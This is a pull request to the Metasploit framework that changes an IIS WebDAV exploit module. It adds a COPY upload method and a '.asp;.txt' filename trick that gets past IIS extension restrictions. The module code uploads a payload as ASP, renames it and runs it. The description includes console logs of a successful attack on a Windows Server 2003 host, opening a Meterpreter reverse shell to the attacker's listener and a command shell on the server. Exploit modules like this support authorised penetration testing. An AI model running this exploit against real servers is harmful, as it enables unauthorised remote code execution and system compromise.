### PR TITLE
iis_webdav_upload_asp: Add COPY and a few other tricks

### DIFF
--- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
+++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def initialize
     super(
       'Name'        => 'Microsoft IIS WebDAV Write Access Code Execution',
-      'Description'    => %q{
+      'Description' => %q{
           This module can be used to execute a payload on IIS servers that
         have world-writeable directories. The payload is uploaded as an ASP
         script via a WebDAV PUT request.
@@ -40,16 +40,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
-        # The USERNAME and PASSWORD are registered again to make them more obvious they're
-        # configurable.
+      # The USERNAME and PASSWORD are registered again to make them more obvious they're
+      # configurable.
       OptString.new('USERNAME',
         [false, 'The HTTP username to specify for authentication', '']),
       OptString.new('PASSWORD',
         [false, 'The HTTP password to specify for authentication', '']),
       OptString.new('PATH',
-        [ true,  "The path to attempt to upload", '/metasploit%RAND%.asp']),
+        [ true, 'The path to attempt to upload', '/metasploit%RAND%.asp']),
       OptEnum.new('METHOD',
-        [true, 'Move or copy the file on the remote system from .txt -> .asp', 'move', ['move','copy']])
+        [ true, 'Move or copy the file on the remote system from .txt -> .asp', 'move', ['move','copy']])
       ], self.class)
   end
 
@@ -75,13 +75,13 @@ class Metasploit3 < Msf::Exploit::Remote
       'method'       => 'GET',
     }, 20)
 
-    if (!res)
-      print_error("Connection timed out while trying to check #{path}")
+    unless res
+      print_error("Connection timed out while trying to checking #{path}")
       return
     end
 
-  if (res.code == 200)
-      print_error("File #{path} alrady exists on the target")
+    if (res.code == 200)
+      print_error("File #{path} already exists on the target")
       return
     end
 
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     end
 
-    if (!res)
+    unless res
       print_error("Connection timed out while uploading to #{path_tmp}")
       return
     end
@@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'headers'      => {'Destination' => path}
       }, 20)
 
-      if (!res)
+      unless res
         print_error("Connection timed out while moving to #{path}")
         return
       end
@@ -157,9 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'method'       => 'GET'
     }, 20)
 
-    sleep(2)
-
-    if (!res)
+    unless res
       print_error("Execution failed on #{path} [No Response]")
       return
     end
@@ -170,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote
       when 'Not Found', 'Object Not Found'
         print_error("The #{datastore['METHOD'].upcase} action failed. Possibly IIS doesn't allow 'Script Resource Access'")
         print_warning("Try using 'set METHOD #{alt_method}' instead")
-        vprint_warning("Pro Tip: Try 'set PATH /metasploit%RAND%.asp;.txt' instead") if not path.include? ";"
+        vprint_warning("Pro Tip: Try 'set PATH /metasploit%RAND%.asp;.txt' instead") unless path.include? ";"
       end
       return
     end
@@ -186,13 +184,13 @@ class Metasploit3 < Msf::Exploit::Remote
       'method'       => 'DELETE'
     }, 20)
 
-    if (!res)
+    unless res
       print_error("Deletion failed on #{path} [No Response]")
       return
     end
 
     if (res.code < 200 or res.code >= 300)
-      # Changed this to a warning, because red is scary and if this aprt fails,
+      # Changed this to a warning, because red is scary and if this part fails,
       # honestly it's not that bad. In most cases this is probably expected anyway
       # because by default we're using IWAM_*, which doesn't give us a lot of
       # freedom to begin with.

--- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
+++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
@@ -42,19 +42,49 @@ class Metasploit3 < Msf::Exploit::Remote
       [
         # The USERNAME and PASSWORD are registered again to make them more obvious they're
         # configurable.
-        OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
-        OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
-        OptString.new('PATH', [ true,  "The path to attempt to upload", '/metasploit%RAND%.asp'])
+      OptString.new('USERNAME',
+        [false, 'The HTTP username to specify for authentication', '']),
+      OptString.new('PASSWORD',
+        [false, 'The HTTP password to specify for authentication', '']),
+      OptString.new('PATH',
+        [ true,  "The path to attempt to upload", '/metasploit%RAND%.asp']),
+      OptEnum.new('METHOD',
+        [true, 'Move or copy the file on the remote system from .txt -> .asp', 'move', ['move','copy']])
       ], self.class)
   end
 
   def exploit
-
     # Generate the ASP containing the EXE containing the payload
     exe  = generate_payload_exe
     asp  = Msf::Util::EXE.to_exe_asp(exe)
     path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s)
-    path_tmp  = path.gsub(/\....$/, ".txt")
+    path = "/" + path if path[0] != "/"
+    # Incase of "/path/to/filename.asp;.txt"
+    path_tmp = "/" + File.basename(path.gsub(/\;.*/,''), ".*") + ".txt"
+    path_tmp = File.dirname(path) + path_tmp if File.dirname(path) != "/"
+    action = datastore['METHOD'].downcase.gsub('e','') + "ing"
+    alt_method = "move"
+    alt_method = "copy" if datastore['METHOD'].upcase == "MOVE"
+
+    #
+    # CHECK
+    #
+    print_status("Checking #{path}")
+    res = send_request_cgi({
+      'uri'          =>  path ,
+      'method'       => 'GET',
+    }, 20)
+
+    if (!res)
+      print_error("Connection timed out while trying to check #{path}")
+      return
+    end
+
+  if (res.code == 200)
+      print_error("File #{path} alrady exists on the target")
+      return
+    end
+
 
     #
     # UPLOAD
@@ -66,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote
         'uri'          =>  path_tmp,
         'method'       => 'PUT',
         'ctype'        => 'application/octet-stream',
-        'data'         => asp,
+        'data'         =>  asp,
       }, 20)
     rescue Errno::ECONNRESET => e
       print_error("#{e.message}. It's possible either you set the PATH option wrong, or IIS doesn't allow 'Write' permission.")
       return
     end
 
-    if (! res)
+    if (!res)
       print_error("Connection timed out while uploading to #{path_tmp}")
       return
     end
@@ -84,29 +114,38 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     #
-    # MOVE
+    # MOVE/COPY
     #
-    print_status("Moving #{path_tmp} to #{path}...")
+    if (path_tmp == path)
+      print_warning("Same filename for PATH and PATH_TEMP detected (#{path_tmp})")
+      print_warning("Do not end PATH with '.txt'")
+    else
+      print_status("#{action.capitalize} #{path_tmp} to #{path}...")
 
-    res = send_request_cgi({
-      'uri'          =>  path_tmp,
-      'method'       => 'MOVE',
-      'headers'      => {'Destination' => path}
-    }, 20)
+      res = send_request_cgi({
+          'uri'          => path_tmp,
+          'method'       => datastore['METHOD'].upcase,
+          'headers'      => {'Destination' => path}
+      }, 20)
 
-    if (! res)
-      print_error("Connection timed out while moving to #{path}")
-      return
-    end
-
-    if (res.code < 200 or res.code >= 300)
-      print_error("Move failed on #{path_tmp} [#{res.code} #{res.message}]")
-      case res.code
-      when 403
-        print_error("IIS possibly does not allow 'Read' permission, which is required to upload executable content.")
+      if (!res)
+        print_error("Connection timed out while moving to #{path}")
+        return
       end
-      return
+
+      if (res.code < 200 or res.code >= 300)
+        print_error("#{datastore['METHOD'].capitalize} failed on #{path_tmp} [#{res.code} #{res.message}]")
+        case res.code
+        when 403
+          print_error("IIS possibly does not allow 'READ' permission, which is required to upload executable content.")
+        end
+        return
+      elsif (res.code == 207)
+        print_warning("#{datastore['METHOD'].capitalize} may have failed. [#{res.code} Response]")
+        print_warning("Try using 'set METHOD #{alt_method}' instead")
+      end
     end
+
 
     #
     # EXECUTE
@@ -118,7 +157,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'method'       => 'GET'
     }, 20)
 
-    if (! res)
+    sleep(2)
+
+    if (!res)
       print_error("Execution failed on #{path} [No Response]")
       return
     end
@@ -126,24 +167,26 @@ class Metasploit3 < Msf::Exploit::Remote
     if (res.code < 200 or res.code >= 300)
       print_error("Execution failed on #{path} [#{res.code} #{res.message}]")
       case res.message
-      when 'Object Not Found'
-        print_error("The MOVE verb failed to rename the file. Possibly IIS doesn't allow 'Script Resource Access'.")
+      when 'Not Found', 'Object Not Found'
+        print_error("The #{datastore['METHOD'].upcase} action failed. Possibly IIS doesn't allow 'Script Resource Access'")
+        print_warning("Try using 'set METHOD #{alt_method}' instead")
+        vprint_warning("Pro Tip: Try 'set PATH /metasploit%RAND%.asp;.txt' instead") if not path.include? ";"
       end
       return
     end
 
 
-
     #
     # DELETE
     #
-    print_status("Deleting #{path}, this doesn't always work...")
+    print_status("Deleting #{path} (this doesn't always work)...")
 
     res = send_request_cgi({
       'uri'          =>  path,
       'method'       => 'DELETE'
     }, 20)
-    if (! res)
+
+    if (!res)
       print_error("Deletion failed on #{path} [No Response]")
       return
     end


### PR DESCRIPTION
- Now supports `COPY` (some times `MOVE` is limited/disabled)
- Safety net if forgot leading slash for `PATH`
- Able todo `filename.asp;.txt` for the  `PATH` now (as well as hint to do it, if the session fails)
  - Able to use it o bypass file extension restrictions in older IIS! =)
- Checks to see if `PATH` is already on the target before uploading the TEMP file & stops if there is (I cannot overwrite)

**Target**

```
meterpreter > sysinfo
Computer        : <REMOVED>
OS              : Windows .NET Server (Build 3790, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/win32
meterpreter >
meterpreter >
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 3004 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

c:\windows\system32\inetsrv>
```

---

```
msf exploit(iis_webdav_upload_asp) > show options 

Module options (exploit/windows/iis/iis_webdav_upload_asp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   METHOD    copy             yes       Move or copy the file on the remote system from .txt -> .asp (Accepted: move, copy)
   PASSWORD                   no        The HTTP password to specify for authentication
   PATH      zzz.asp          yes       The path to attempt to upload
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST     <REMOVED>        yes       The target address
   RPORT     80               yes       The target port
   USERNAME                   no        The HTTP username to specify for authentication
   VHOST                      no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <REMOVED>        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > run

[*] Started reverse handler on <REMOVED>:4444 
[*] Checking /zzz.asp
[*] Uploading 611022 bytes to /zzz.txt...
[*] Copying /zzz.txt to /zzz.asp...
[!] Copy may have failed. [207 Response]
[!] Try using 'set METHOD move' instead
[*] Executing /zzz.asp...
[-] Execution failed on /zzz.asp [404 Not Found]
[-] The COPY action failed. Possibly IIS doesn't allow 'Script Resource Access'.
[!] Try using 'set METHOD move' instead
[!] Pro Tip: Try 'set PATH /metasploit%RAND%.asp;.txt' instead
[*] Exploit completed, but no session was created.
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > set PATH /metasploit%RAND%.asp;.txt
PATH => /metasploit%RAND%.asp;.txt
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > run


[*] Started reverse handler on <REMOVED>:4444 
[*] Checking /metasploit140597426.asp;.txt
[*] Uploading 614030 bytes to /metasploit140597426.txt...
[*] Copying /metasploit140597426.txt to /metasploit140597426.asp;.txt...
[*] Executing /metasploit140597426.asp;.txt...
[*] Sending stage (957487 bytes) to <REMOVED>
[*] Deleting /metasploit140597426.asp;.txt (this doesn't always work)...
[!] Deletion failed on /metasploit140597426.asp;.txt [403 Forbidden]
[*] Meterpreter session 6 opened (<REMOVED>:4444 -> <REMOVED>:1066) at 2015-12-26 16:06:32 +0000

meterpreter >
```
